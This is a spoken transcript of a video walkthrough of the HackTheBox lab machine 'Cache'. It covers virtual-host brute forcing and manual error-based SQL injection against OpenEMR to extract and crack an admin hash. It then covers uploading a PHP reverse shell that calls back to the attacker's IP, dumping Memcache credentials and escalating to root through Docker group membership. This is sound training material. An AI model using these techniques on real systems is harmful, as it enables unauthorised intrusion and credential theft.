What's going on YouTube? This is IPSec. I'm doing Cache from HackTheBox, which has a lot of fun things to show. The very first being a DNS brute forcing through VirtualHost. It's the only part of the box that I'm not a huge fan of, and I think why it didn't get super high reviews, because it's a bit unrealistic to have to brute force the domain name of a box through VirtualHost file, because you have DNS to do that for you. If you do subdomains, that's completely valid, but this one was doing an actual domain, and you'll see probably in 10 to 15 minutes. After that, though, the box is really fun. You have to do a error-based SQL injection, and I bet a lot of people probably did it just through SQL map, but we're going to go and do it all manually, show a little bit of BurpSuite Intruder, because the last time we did a error injection through SQL, I think I wrote a Python script, so I like changing it up. So when you see the same thing, it's a little bit different. It's also been probably over a year since we did error-based SQL injection. And then after that, there's a Memcache, like just enumerating to see what's in the database, extracting usernames and passwords, and using those to SU, and a Docker one-liner to get root. So with all that being said, let's just jump in. As always, we're going to start off with the NMAP. So sudo nmap-sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it cache, and then the IP address, which is 10.10.10.188. Can take a while to run, so I've already ran it. Looking at the results, we have just 2 ports open. The very first one being SSH on port 22. It's telling us it's an Ubuntu server. We also have HTTP on port 80, and it's running Apache and also tells us it's Ubuntu. We got the title of cache, but there's really no other information. So let's just go check out the web server. So going to 10.10.10.188. And we get a page that just has like what is hacking or something. So I'm going to poke around the page, but first let's just run a GoBuster. And before we do GoBuster, it's always nice to identify what type of page this is. Is this like PHP, Python, what is it? Because that kind of influences what dictionaries and commands we run. So I do like index.php. It's not found, so this is probably not a PHP web server. Just seeing like HTML files, this is like indicating it is potentially completely static. I'm going to do Control-U to view the source and see if I have any hints of any type of framework. But right now, I'm thinking this is just a completely static website. So let's just run GoBuster against this. So we'll do GoBuster-U for URL, HTTP 10.10.10.188. And before we do this, we have to put it in dir mode. -W for word list. We're going to do opt seclist, and then discovery, web content. I forgot what one I normally use. I guess raft small words is going to be the one we generally use now. So raft small words.text. I'm going to do -X for arguments, HTML, -O, GoBuster-root.out. So we'll let that run so we have something going in the background while we poke at this. You can never get your time back, so it's always important to have something running while you just manually look at something. Going to author, we do have a potential username of Ash. This host cache.htb. So I'm going to go and edit my host file. So sudo vi etc host, and we're going to do 10.10.10.188. Put the host name in there, and then keep going. He's a security researcher and other projects like Cache, HMS, Hospital Management System. And this, it's a long shot, but this is a big hint. Later on, we'll see HMS is an actual domain name on this. So other projects like Cache, cache.htb, HMS, hms.htb, it's a long shot, but that is the intended hint. But when I was going through this box, I went over to like the login page and I tried some default things like admin. And when I go to log in, password didn't match, username didn't match. So we have a way to enumerate both username and password. On that previous page, it said the user was Ash. So I do that, and I just get password didn't match. I'm going to send this over to BurpSuite so we can do some type of SQL injection. So I set intercept on, and my BurpSuite is already on Burp. I'm going to do login, and it doesn't get a burp. I'm going to Control-Shift-R to refresh the page, and I always do Control-Shift-R because I think that like clears the cache or something. It tends to work better than just Control-R. And we'll try username of Ash, password of please subscribe, log in, and we don't get anything in Burp. So something weird is going on. Let's take a look at the source. So I press Control U again and see what happens here. It looks like there is a jQuery functionality.js. That's the first one I'm going to look at because these are going to like websites. This is not created by the CTF. This is on the web server. So yeah, let's check that out. And we have some JavaScript here, and it's function check correct password. If password is have fun, then if password is not have fun, then print password did not match. If username's not Ash, print username didn't match. So we got some client-side validation here. So we can just put the password of have fun and log right in. Log in. We see the red dot near the bottom of my screen, so it went over to Burp. And we just get welcome back. This page is still under construction. So nothing too interesting after we log in, but we should mark down those creds. So I'm going to do vi credentials.txt, and I copied the, I guess, masked out password. Let's see. Copy. Ash. I'll do Control Shift Insert. There's two clipboards on Linux. So I was doing Shift Insert, which is that. Control Shift Insert is a second clipboard. Always gets me, but yeah. So we have that credential file. This GoBuster is still running. We got a lot of 403s that it's showing us. I'm not sure why it's showing 403. I guess, what is 403? Is that access denied? Let's just try .php and see what happens. So .php, forbidden. So anything that begins with a period gets forbidden. We have contact us, author, news, login, index. So everything kind of looks normal. We haven't seen anything we haven't gotten to yet. So let's do a second GoBuster, and we're going to do a DNS discovery. So let's look at the help. We'll do GoBuster DNS-H, and you could just do GoBuster-H, and here are the modes: DNS, DIR, and VHOST. And thinking about this, we probably want to do VirtualHost Bruteforcing. So we'll do VHOST-H, and I say that because I think DNS may actually make DNS queries. So VHOST will be a virtual host, and that's what we want to do. Let's see. If you don't know what a virtual host is, it's pretty simple. It's literally just the host header and a website. So right here is the, I guess, virtual host name. So we can go to the page. We see it's 2,698 bytes. Sometimes web servers host multiple applications. This is super common in like shared hosting environments. And the web server knows which application to go to based upon this header. So if the web server had a different name, a different application for cache.htb, it would serve it to a different place. And before I hit this, I'm taking note, 2,698. It stayed the same, so cache.htb did not resolve to a different page. So let's go and finish our GoBuster command. So we want -u for URL, and this is going to be a little Nostradamus because I know I want to do a main domain, not a subdomain. So I'm just going to do http://htb. Normally I would do like cache.htb, so it enumerates subdomains, but I just want to enumerate the main domain. So we're going to try this. I don't know if it's going to work, but it's worth a shot. And we'll use the word list op, sec list, discovery, DNS, and subdomains, top million, 2000. This seems fine. Does this error? Word list not set. We forgot -w for word list. And we'll see if this works. Let's see. Unable to connect to this. So let's do etc host. And we'll say this is also HTTP. Does it work now? Looks like it does. And that's a weird one to go. Global catalog dot underscore something. I don't know why it discovered that page, but I guess maybe Apache just 400s? I really don't know. The Etsy host sudo. I guess we didn't have to do that. We could just put it in this host header. Bad request. Maybe it doesn't like underscores in the name. Yep, anything with an underscore looks like it's going to be a bad request. So it's still running. I'm going to fast forward the video until this command finishes, and hopefully it actually gets a hit. I'm surprised it hasn't yet, so let's just speed things up. And we have found hms.htb, so let's go over to BurpSuite before we edit our host file. And we can put hms.htb, and we get file not found. So let's just do slash. We get 302 found, and we go to a location we didn't know before. So we have found a valid domain name for this. So let's go sudo vi etsy host and change this to add hms.htb. So now our box can actually resolve it. So if we go to hms.htb, going through BurpSuite, is our proxy off? Looks like it is. And we get OpenEMR. The copyright is 2018. So right off the bat, I'm going to check out Searchsploit to see if there's any exploits for it. So Searchsploit OpenEMR. If I can type, that would be handy. And let's see. Looking at 5.0, we have authenticated stuff. This RCE right here. Generally, when I see like command injection cross-site scripting, I'm assuming that requires some type of credential or cross-site scripting attack. So looking at this, I see authentication right here, so I'm going to ignore that one. We see 410 SQL injection. So before I throw this, let's see if we can enumerate what version this is. So I'm just going to Control U to look at the source. It said 4.1 something, so I just searched for 4.1, don't see it. Let's try 5 period, still don't get a hit. So the next thing I generally do when I want to enumerate versions is I just search for it on GitHub. So GitHub OpenEMR, and look at what files are in the web directory. So we're going to interface login.php, and I see an interface directory here, so chances are I'm in web root right now. And we can check if we can hit these files. A good one normally is like readmes or changelogs. Changelog is a gold mine if you ever find that, because it always tells you what version it is. We can do readme.me. Was that what it was? Oh, md, not me. And we get a file. We can look at this file and see if it has a changelog. I don't know how to zoom on this. Right here, maybe? Nope, that's search. I'm just going to do 4 dot, nothing, 5 dot, nothing, version. Spelled correctly. We don't have anything. So this readme.md doesn't tell the version. I don't think any of these files do. We can try version.php, but it doesn't actually return anything. So we don't really have too much. At this point, I'd probably like Google open, EMR, and then exploits to see if there's anything here. And 5013 vulnerability report. So let's take a look at this and see if an exploit just didn't make it into exploit.db. And we see a bunch of SQL injections. And actually, before I do that, we test this out. Not that one. The SQL injection to confirm it's not 410. So we can just look at this, and it's doing this query. So we can just send this into a browser and see if we get anything. Go this, let's turn BurpSuite on, send, repeater tab, this, and doesn't look like we get anything. Based upon this, it's doing a union injection, so we should see the username. And we don't, so I'm going to assume that exploit doesn't work. So going back to this PDF, we have a bunch of SQL injections. I'm going to look at the first one, and looking at this POC, it's pretty messy. 4 rand, like, there's a lot of text there. So I'm just going to move on to the next one. And we have a relatively simple looking exploit of this. So I'm just going to paste and try this. And we can probably just go back to our burp window, send. We'll have to do URL encoding. So let's just Control U to do that. And we just get a 302 found. So I go back to the page and let's read what they say about this. There's an SQL injection in this that's caused by unsanitized input. Exploiting this vulnerability requires authentication. However, it can be exploited without authentication when combined with the patient portal bypass mentioned above. So let's look at the patient portal bypass. So going to the very top, we look at this, able to bypass the patient portal login by simply navigating to the registration page and modifying the requested URL to access the page. So let's try that first. Let's turn BurpSuite intercept off. And we'll go into the login screen. I don't see any registration. I'm just going to guess and try login/register.php to see if we hit anything. And not found. So go back to this GitHub page, scroll up to the top, look for register.php to see if that file exists anywhere. And let's see. Register.php. Looks like it's in portal account register.php. So let's go portal account register.php. So like the CVE says, we hit the registration page. And what I'm going to do is turn BurpSuite back on. Control-Shift-R. Send this request to repeater. And I'm going to copy this. We're just going to send this URL in this. And what this did by hitting the registration page, it probably set some value in either PHP session ID or OpenEMR that gives us access to hit this page. So sending this request, we get an error message. So again, on this one, same exact request, no error. This one, error message. We can try putting the PHP session ID to identify what cookie did it. So putting this here, we get an error message. So it's the PHP cookie that gives us this error message. We can try using this PHP cookie to see if this one has any data in it that would do it, but it doesn't. So the registration page set something in this session that lets us access this page. What? I guess I didn't have it on my clipboard. So paste, send. So now we have a error message. Let's see. It says you have an error in your SQL syntax. We don't have a space there. There we go. So this is XPATH syntax error. What we're doing is error-based SQL injection. And we have a very limited amount of space right here. And we could just send this to BurpSuite SQL map right now and dump everything. But you guys normally like seeing how it actually works in the back end. So we're going to go dig into this SQL injection while we do the SQL injection manually. So I'm just going to delete this real quick, and we'll copy the file. Where is that? Let's see. Copy to file right there. Change a directory to be cache, and this will be inject.request. And then I will put our error message back there. And we'll just start SQL map in the background. So SQL map -r inject.request --dump --batch. And this should just run in the background and dump everything. But if you want to learn if what I'm about to say doesn't make sense how to do this, always go over to like ipsec.rocks and look at one of the older videos of me explaining things, because I tend to do more research when I first started and explain things a bit better. Maybe, I don't know. So we'll see. So you can just do SQL probably error and specifying an error string in SQL map to that's not it. Manually doing error-based SQL injection with extract query. So this video is probably going to be exactly what we do. So let's go back into BurpSuite. And what I'm going to do is change this extract value command to be a SQL statement. So I always like doing, instead of just 0x0a, which is a line break. Oh no, 302 found. SQL map did something. It invalidated my session. That is annoying, but turn off, hit the registration page, go on. We should have intercept on. Copy these cookies. Paste this. Okay, we are back. So, what I was saying, I always like having, we are on this one, the 0x0a as a line break, because without it, it looks like this, where this is our actual input we're looking at. But if we put that line break there instead, 0x0a right there. So extract value doesn't need anything. But if we put the line break, that's what we injected. So it makes it much easier to just see, I think. So see, that's concat. So we can do a SQL statement right here. So let's do select database. And we have a error in SQL syntax. Do I need another parenthesis? There we go. So database is OpenEMR. So this is important because we're going to be enumerating the information schema table. And if we went through like all the default tables and databases, it would just take forever. So this lets us skip a lot. So let's go over to MySQL information _ schema. Turn BurpSuite off intercept. And the first table we want is probably tables. Come on. There it is. The tables table. And this tells us how this is laid out. Table schema, this is the database name. And then we'll probably want column name and table, or just table name. So let's go back to BurpSuite and we'll do, instead of select database, let's just change select one. Session went back to invalid. Something is happening. SQL map wasn't running. Let's see. And extract value. Okay, let's just hit the registration page yet again. Hit. And I guess we have to grab a new cookie. This is going to be annoying if we have to keep doing this. I wonder if someone else is on this box that is doing something. PHP session's different. Okay. Unknown column select. So let's do select +1. And we have the XPath correct. So we can do select table name from information schema dot, what is it? Information schema dot table underscore schema. So, oh, nope. This is the database name. My bad. Or table name. And we are in information schema tables. So from information schema tables. So this is database dot table. And we can say where is it table underscore schema? Yep. Table underscore schema is like OpenEMS. Let's see, select table name from information schemas where table schema like OpenEMS. Try another quote, get rid of a quote. Let's see. To the right near. Wonder if I didn't URL encode something. Query failed. Let's do open %. Okay, maybe it's not open EMS. Let's do this real quick. Select database. Open EMR. So that's where that mistake was. Percent in SQL is wildcard. So subquery returned more than one row. So we can get around that by doing limit 1. And we got one thing. And we can do comma 1. And there's going to be row and max number of rows. So we can do like limit 01 to get address, missed data, amendments, and we can start dumping every single column inside of this table. But we're going to 50 and there's still columns. So there's a lot of columns in this table. And I normally use like a Python script in the video to show you how to do that. But I mean, it's going to take like 5 to 10 minutes to write that. You should be able to do that as a good exercise. Instead, I'm going to show you a pretty cool feature in Burp. I think it's the paid feature though. That is the intruder. So we can go to positions, clear everything, and we want to inject right here. So I'm just going to do add around that, and I'm going to go to payloads. Instead of simple list, I'm going to go to numbers. We'll do sequential from 0 to 300. Step is like the increment. If it was 2, it would go like 0, 2, 4, 6, 8. 1 just goes in even increments of 1. So we start the attack, and we're getting a bunch of things. So we can go through this. If I move it up, go to response, query error, so we can see it's getting data. But it's a pain to kind of look through it that way. We can go through the grep extract, and if we click add, we can say start at expression and highlight this. Copy, paste. So we're starting here. And we're ending at a single quote. So if this end delimiter was blank, it would show us everything as we're going. That's why I was a bit confused. So end at single quote, and it's going to grab everything between what we just typed. Click OK. Go back to our results. Wait, what? Grep 846. Oh, I clicked 846. My bad. Start at the expression and then end at delimiter. That's what we want. Go back to results. And I don't know why it did not work. Let's remove and redo this real quick. We start here. We end at a single quote. Click OK. It may have just not liked me editing it. Hopefully that's the case. Yep, there we go. So here's the tab, and it shows everything. So we can just scroll through all these tables, and we see users, user facility, and user secure. And you could look in the PHP code, you could dump it manually, but I'm going to cheat. I know we want this users secure table. So let's go back to the information schema, how this is set up. We can look at columns. Let's turn off BurpSuite so it goes a bit faster. Let's see. Go back. And we want the columns table. And this is pretty much the same thing with table name, schema name, but it has column name. The reason why I didn't start at that, because table name, when it incremented, it would be like 0 through 50 has the same table name. So that's why I started enumerating the tables column. So we can go back into BurpSuite, go to Repeater tab. I'm going to double click this one and say extract tables. And then we'll do this one and say extract columns. And instead of table schema, we can say table name is like users underscore secure. And we want to select the column name. We are still on information schema tables. So we can do columns and we get ID. So we can go 0, 1, so ID, username, password, salt, last update, password history. So we probably want to get username. And we can just do select username from users secure. And we don't have to specify the database because that's the active database we're in. When we did the database open close parentheses, it told us we're in OpenEMR. So username is going to be OpenEMR underscore admin. And we could also look at the next one potentially. So if we do plus limit 0, 1, 1, 1. So there's no second user on this, only one. So OpenEMR admin. So I guess crack, because we're going to probably get a password hash. So the next one's going to be select password from this. And here's what we get for the password. And this is where it's going to be important to note that there is a max in XPATH. I mentioned it before. If we do echo-n, paste this, wc-c, we are 31 characters. Keep in mind, we inserted a line break that is this with this concat. So we are actually at 32 characters. So the next thing we have to do to get more characters, to see if there are more, is a substring command. So we can do substring, what we want, the variable name, so password, and then probably 0, 2. Let's just see if this works. Error. Let's try starting at 1, and we get 2 characters. So let's grab the first 30. And it's going to be at the period T. So I'm going to copy this. We're going to back here, vcrack. Let's see, I'm just going to repaste this. There we go. So let's go from 30 to 60. And I'm going to do 29 to 60 real quick. So it's period T, and we want to look at what we grabbed. We grabbed period T. So let's go 30 and then 31. So this is starting right where we left off. I always like going a little bit before just to make sure we're grabbing everything we want. So that looks like the password hash. We can cat crack. And I think hashes generally like ending in like even numbers. So echo-n, wc-c, 53. Maybe that's good. It's not what I expected, but we'll just try cracking this hash real quick. So let's cat crack, and we should have the hash. I'm going to SSH to the Kraken, which again is just a box in my basement because you should never crack in VMs. And additionally, cracking on a machine while I'm doing my recording would result in like drop frames potentially. So I always SSH off of my box to do it. It doesn't hurt that this box has a few graphics cards in it to help speed things up. So put the hash in a file. And this one's actually tricky to crack. Whenever I see $2 this, I know this is going to be a bcrypt hash. This is kind of the algorithm it's using to encrypt, and this is the iteration count, I believe. So if we do hashcat -- example hashes grep 2a 05. Oh, actually, it looks like it grabs it. So let's do -b 5. So this one it grabbed. It's 2 something, bcrypt blowfish. You may also see like 2y, and when it's 2y, you still use the same algorithm, but yeah. And the iteration count could be different. It could be like 10. So mode 3200. So /hashcat -m 3200 hashes / what is it? Cache and opt word list rocku.txt. And oh, because I have the username, I just specify -- user, I believe. Maybe it's -- username. I always like putting the username in my hash files, just so I know what it went to afterwards. So we can see it cracked, and the password was a few X's. So I'm just going to do -- show. We can see 6 X's is the password for the user OpenEMR admin. So let's go back to our website. This is going to be hms.htb, and we can log in. So OpenEMR _admin 3123, 6 X's for the password, and we get in. And if we read a lot of the reports on like exploits, it kind of highlights this, but it's simple enough. You just go to administration files, and we have a file manager here. So we can just drop a PHP shell. So I'm going to go back to my box, locate, forget where it is. Locate .php, cd user find .grep php, codium grep shell. Okay, here's it. It's this user share laudanum. I don't know exactly what that is, but this is the web shell I always use with PHP. At least my first one. So go to PHP. Look at this PHP reverse shell. Since we're going to be editing it, I'm going to move it back to my directory where I'm working. So HTTP cache, go into that directory, and we can edit this file, removing the comments. And we just want to put IP and port. So let's do 10.10.14.2, I believe. That is my IP. And the port, 9001. Okay, let's name this to please subscribe.php and do a NC-LVNP on 9001. And then let's go to upload this. So browse, IPsec, HTTP, cache, please subscribe.php, destination, use source, that is good. And we're uploading to site's default images. Save. Let's see if that actually worked. hms.htb, site's default images, please subscribe.php, and we have a shell. So we can do which Python 3. So we have Python 3 on the box. So Python 3-c import pty, pty.spawn, bin bash. Gets me kind of a shell, but I don't have things like tab autocomplete right now, so I'm going to press Control-Z to background the shell, stty raw minus echo, hit enter, then type fg enter twice, and we're back in the shell. So now I have tab autocomplete. I'm going to do export term is equal to xterm. And now I can clear the screen, which is handy. And I'm going to do ss-lnpt to look at open ports. We could just run like linps or something and do this, but should always look at open ports. And we see two things of interest. The first thing is a SQL database, and 11211, this is a Memcache port. The first thing I'm going to look at is probably going to be the SQL database. So we go in public.html and maybe find.grep config, config.php, maybe site's default config.php, grep-i data. I don't know where the database is. Maybe grep-i mysql on site's default config.php, grep database star, setup. Let's see. Let's just Google OpenEMR change database password. See if they tell us what password what file the password is in. Let's see. Administration users. Doesn't look like it's there. Let's see. Change OpenEMR. Okay, once I change this password, what file do I edit? PHP? sqlconf.php. So find.grep sqlconf cat site's default sqlconf. And we got the login, OpenEMR, and this password. So we can try mysql-u, OpenEMR, do -p, enter the password. And actually, I don't know why I'm doing this, because we did SQL injection to enumerate the usernames. Show tables. No database selected, so we can do use OpenEMR. And then maybe like select star from users. We got OpenEMR admin, female service, but we don't have any password hashes here. So we can do users underscore secure. See if we had any more users. We actually, oh no, we don't have another user. So just still one user in this database. There's not much we can do with that. So we could try that password with valid users. So we could like cat etsy passwd, and we see Ash, Luffy. Let's grep for bash to get login shells. So I have the password still on my clipboard, so I can do like su dash, put that password in, try logging in. We can do su ash, try log in. We could go to the credentials we have and try these passwords. This was from that like login page way off the beginning. So su dash, log in, su ash dash, log in. Oh, that's Ash's password. Can we just SSH'd in? 10, 10, 10, 188. Yes. Oh. Ash. Oh, Ash is on the SSH denied users. It's not even letting us type a password for him. If we put an invalid user. Huh. Okay, Luffy can SSH. SU dash Luffy. Try those passwords. And can't get in. So let's enumerate that. Oh, shoot. I don't know what it just said. Session terminated, terminating shell, but still got a shell. So things look fine. So let's go to Memcache. So you could just Google like exploiting Memcache because that's what's listing on port 11211. And there's a bunch of things you can do. This is a really good one, I think. This hacking articles. If it loads. This is a good one to read. Again, if you probably go to ipsec.rocks and type in Memcache, pretty sure we've exploited it before. Yep. So we've definitely exploited it before. So telnet localhost 11211. And let's see. We want to do maybe stats items. And we can see there's 5 items in this Memcache database. And essentially what Memcache is, it's just a caching thing that stores the like output of some variables. So it doesn't have to keep running the code again. So if you have like a heavy SQL query, let's say the Hall of Fame or a bunch of like scores, and you do a bunch of calculations based upon all the flags every user of a website hit, you don't want to run that calculation anytime someone hits like halloffame.php. So Memcache will cache all that information. So when you hit that page again, it's stored a lot, so it's not a heavy query against the database again. So essentially, that's what Memcache is doing. Let's see, we can do after stats items, stat slabs. Is this it? What is the next thing? Stats items. Don't know about that. Oh, cache dump. And the slab ID, which is going to be 1, is the first one, and then 0 is going to be unlimited. So if we do stats cache dump 1 0, we see there are 5 items in this cache article. I don't think there's any others. So if we do stats cache dump 5 0, nothing. Stats cache dump 0 0. Stats cache dump 2 0. Whoops. Stats cache dump 2 0, nothing. So we just have link user passwd file account. So we can do get link. It's pointing to HackTheBox, get user, Luffy, get passwd, one piece, get file, get account. So Luffy has the password of One Piece. So I guess they're an anime fan. So let's do SSH Luffy or Luffy. I forget how you pronounce his name. Put his password in, and we can log in to this box. So we can try sudo-l, enter his password, and he can't run sudo. lsla, there's nothing really there. Ash is the one that had the user.txt file if you wanted to go grab that. So we could do like find slash dash perms minus 0, or is it 4,000 for set UID bits? Dev null. That looks like for set UID. I think that's working. Let's see. We can do dash ls, and this will tell us. Does this have set UID? Yeah, everything here has S here. So that's saying set UID. I don't really see anything too interesting. We can also run like groups to see what I'm a member of. And I'm a member of the Docker group. So what I'm going to do is go to GTFO Bins, and we're going to search what Docker can do. So we got a shell. Sounds pretty cool. Docker run /mount rm it alpine chroot mount sh. Let's just try running this and see what it does. Unable to find image alpine latest locally. So it doesn't look like it's going to work. So we can do Docker images to list what images are here. Alpine is just a really small Linux distro. So it's common in Docker. So I ran Docker images. We see Ubuntu is here. So we can run Ubuntu. We do ID, we are root, ls, we can go into root and get root.txt. So what this did, I think v is mount point. So essentially, Docker has permissions over the, like, it's a set UID binary, I think. Let's do this find command, grep-i docker, which docker stats. Did I screw up a command? Maybe it's just stat. 0755. No, it's not set UID. It's because the Docker user has the permission. So essentially, when he does Docker things in Linux, he can take over the disk. And that's what this is doing, I believe. I haven't looked into it in a while, but the Docker command, does this actually explain it? No. Let's see. Explain bash shell command. There was a web page that would just explain. I said explain, I typed exploit. Explain bash shell. Let's see if it actually works with Docker. It's better than me potentially getting it wrong. So explain shell to me. Paste. Explain. Docker. It doesn't know. So I think this is mount point. Man Docker. Let's see. -v. I'm pretty sure that's mount point. It's mounting / and the containers /mnt. The --rm I think is delete when done, maybe. Let's see. It's not explaining what rm is. IT is like an image name, Ubuntu, and then we're going to chroot. So we're going into /mount and then running bash. So if we got rid of this chroot, it would probably be a bit more obvious what's happening. So if I do cd/root now and go into it, there's nothing here because I'm in the Ubuntu Docker image. But remember, we mounted / of our host operating system into /mount. So if I go to /mount, that's where another operating system is, which is the host, and we got root there. If you wanted to shell the box, you could do .ssh and put an SSH key and then SSH in. Or you could edit the shadow file. You could edit, yeah, there's a bunch of ways you can get root from here. Let's exit. Go back to that chroot one. Just do docker. That. And what I want to do is cron tab -L to list. And we can see all the crons that run on this. And every minute it's running this bash script, which is putting the information inside of Memcache. So if you didn't want to access Memcache through Telnet, you could always use Chisel, and we could set up a tunnel. So do I still have that netcat session up? I do. So let's exit Telnet, and I held Control and did right bracket to get to this Telnet prompt. And I can type quit to exit Telnet, and let us upload Chisel and run a bunch of binaries against Memcache to enumerate it for us. Going back to Firefox, let's go and search for Chisel. So Chisel GitHub. Grab this. And let's see, there should be a release, 1.71. I'm going to download AMD 64. Save. Going to CP downloads, Chisel, gunzip-d, Chisel. We should have it here. So make dir dub mv chisel to dub. I'm actually not going to bother using Python HTTP server to transfer this. Instead, I'm just going to run netcat. So netcat lvnp 9001 and direct chisel to it. And we can go to dev shm, netcat 10.10.14.2, 9001, connect to my box, and send whatever my box sends me down to Chisel. So connected, and it is currently sending. I'm going to control C out of this because it's probably sent by now. The only downside to this, doesn't control C out for you. chmod plus x chisel. And we see they're the exact same size. We should probably MD5 sum them, but I'm lazy. I'm just depending on that file size right now. Chisel server -- reverse, because we want to do a reverse port forward. The reverse port forwards whenever a client is connecting to your server and saying, hey, open up port this and send all that content to me. A local port forward is when the client connects to the server and says, here is my port. I'm going to send it to something on your port. If you're confused, I've referenced this enough, but go to the Reddish video. I have a bunch of like PowerPoints explaining all the port forwarding because it's much easier to do in graphics. It looks like pointer dereference. Chisel server, maybe. Okay. Chisel defaults to port 8080, and port 8080 was in use. Glancing through this, that is not an obvious error code. Port 8080 is currently in use by BurpSuite. So I do chisel server port 8000 reverse, and we can do chisel client 10.10.14.2 port 8000 R for reverse 112.11. We want to send Memcache on our local host. This is what port to listen to on the remote end. So my parrot box is going to open up port 112.11. When anything goes to that port, it's going to send it through this tunnel, and its destination is going to be this. So we have that tunnel set up. If I netcat localhost 11211, stats, items, Memcache is working. So now we can do like Metasploit to enumerate this. So msf-db run. And gem install io console. Sudo. Hopefully I don't bork my instance. I probably should have snapshotted. Sudo msf console. User share Metasploit framework. Something broke. Sudo bundle install. Or maybe I shouldn't have done that. It's saying don't run bundler as root. Too late. Come on. This is promising. There we go. So no clue what that was about. But relatively easy to fix. Search Memcache. And we got pretty highlighting. Let's see. Auxiliary gather Memcache extractor. Use. I don't think I've used Metasploit 6 before. This is a much prettier interface. And for all the people that don't like Metasploit, well, it gets the job done, it's quick, and for a lot of things, I think you'd be silly not to use it. So we can do show options, set our host 127.0.0.1, run, and we see, found 4 keys, account file passwd, and not really that pretty of input, but we grabbed them. Luffy, One Piece, whatever. Show Memcache, or search Memcache is another one we could run. EDP version, denial of service. Nope. So that's dumping it through Metasploit. And the reason why we had to use Metasploit is because, or not Metasploit, Chisel. If we look at this port on a remote box, it's closed. But yeah. So let's see, another way we can do this is probably through some binaries. So we can just install libmemcache tools and use the native tools to play with it. And these tools are essentially sending the same exact packets we did with our telnet command. So when installing the package, it says, and then let's just try this memcstat command. And we can probably specify server localhost. So memcstat -- server equals 127.0.0.1. Servers. And we get a bunch of information off the server. So we can go down, memcdump. And we get link user passwd file account. Is it going to get us anything else? Doesn't look like it. memccat, and we can cat the things we saw. So memccat link. So we could link user passwd file account and dump everything. So yeah. memcp file. I don't know exactly what that's doing. You can copy through Memcache? Can we? File? mem_cp. Let's see, touch, file. We'll do etc passwd. I think we can upload files. Let's see. NCLVNP 9001. Let's go back. Hit this page. Oh no, we wanted Luffy's password, which was up here. So Luffy, one piece. SU-SH, Luffy at 10, 10, 10, 188. Put one piece in. This is going to be the Docker one-liner. So GTFO Bins, shell, paste, and change Alpine to Ubuntu. Now we are root. So what we wanted to do was cron tab -L. Let's see. Is update on this? It is. Okay. So v temp whoa. Please subscribe. We're going to do temp whoa. Run update db on this host. Locate whoa. Update db. Doesn't look like it uploaded. It's finding who am I, which is funny. Who am I? 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 So I need to actually read that more in depth, exactly what that's doing. Data stored and attacker can use to easily upload malicious files to the server too. Say memcp, memcat. So we do memcat, temp whoa. Whoa. So the file may exist somewhere. Etsy passwd. Let's see. Dumping down with Metasploit. And I think we're done. I think it just uploaded the file somewhere in Memcache's database. So it didn't actually put it on the server. It just, yeah. Let's do v etsy please sub test. Let's do temp please sub. Because this file definitely won't exist on the server. Update db. Locate please sub. Please subscribe does exist. Find slash to dev null grep please sub. And that will be the video. Wow, that finished fast. Hope you guys enjoyed. Take care, and I will see you all next week.